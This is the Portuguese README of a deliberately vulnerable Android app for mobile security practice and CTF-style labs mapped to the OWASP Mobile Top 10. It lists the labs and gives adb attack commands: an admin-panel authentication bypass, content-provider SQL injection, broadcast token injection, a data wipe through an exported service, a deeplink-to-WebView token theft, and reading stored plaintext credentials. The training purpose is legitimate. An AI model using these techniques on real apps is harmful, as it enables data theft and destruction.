
Aplicativo Android deliberadamente vulnerável para pesquisa de segurança móvel e prática de bug bounty - OWASP Mobile Top 10
Um aplicativo Android deliberadamente vulnerável para pesquisa de segurança móvel, prática de bug bounty e aprendizado no estilo CTF. Contém 21 vulnerabilidades documentadas mapeadas para o OWASP Mobile Top 10.
git clone [email protected]:b4sith-sec/Gu3ssWeak.git
cd Gu3ssWeak
./gradlew assembleDebug
adb install -r app/build/outputs/apk/debug/app-debug.apk
Inicie o aplicativo, percorra cada laboratório, capture as flags e submeta-as no placar CTF do próprio aplicativo.
| Categoria | Vulnerabilidades | Flags |
|---|---|---|
| WebView | WV-01 a WV-05 | 5 |
| Deeplink | DL-01 a DL-04, DL-CHAIN | 5 |
| Auth / SQL Injection | SQL-01 | 1 |
| Painel Admin | AP-01 a AP-04 | 2 |
| ContentProvider | CP-01 | 1 |
| Broadcast Receiver | BR-01 a BR-03 | 2 |
| Service | SV-01, SV-02a, SV-02b | 2 |
| Interceptação de Rede | NET-01 | 1 |
| Banking / OTP | OTP-01 | 1 |
| LFI | LFI-01 | 1 |
| Armazenamento | STORE-01 | 1 |
| XSS | XSS-01, XSS-02 | 2 |
20 flags no total, além de uma flag master concedida por capturar todas elas.
| Lista de Laboratórios | Placar CTF |
|---|---|
| lab |
# Painel admin - exportado, sem permissão
adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity
adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity --ez is_authenticated true
adb shell "content query --uri content://com.gu3sswe4k.app.contacts/contacts/1 --where \"1) OR (1=1\""
# Injeção de token via broadcast
adb shell am broadcast -a com.gu3sswe4k.app.SEND_TOKEN --es token FAKE --es user attacker
# Apagamento de dados via serviço exportado
adb shell am startservice -n com.gu3sswe4k.app/.services.DataSyncService --es action wipe_user_data
# Deeplink para cadeia de RCE no WebView
adb shell am start -a android.intent.action.VIEW -d "vulndroid://settings?redirect=com.gu3sswe4k.app.activities.WebViewActivity&url=javascript:VulnBridge.stealToken()"
# Ler credenciais armazenadas em texto simples
adb shell run-as com.gu3sswe4k.app cat /data/data/com.gu3sswe4k.app/shared_prefs/login_prefs.xml
# Monitorar segredos registrados em log
adb logcat | grep Gu3ssWeak
Este projeto é puramente educacional. Todas as vulnerabilidades são intencionais e documentadas. As técnicas mostradas aqui se aplicam a aplicativos reais, mas teste apenas sistemas que você possui ou está autorizado a testar. Consulte SECURITY.md para o aviso legal completo e orientação de divulgação responsável.
MIT - consulte LICENSE.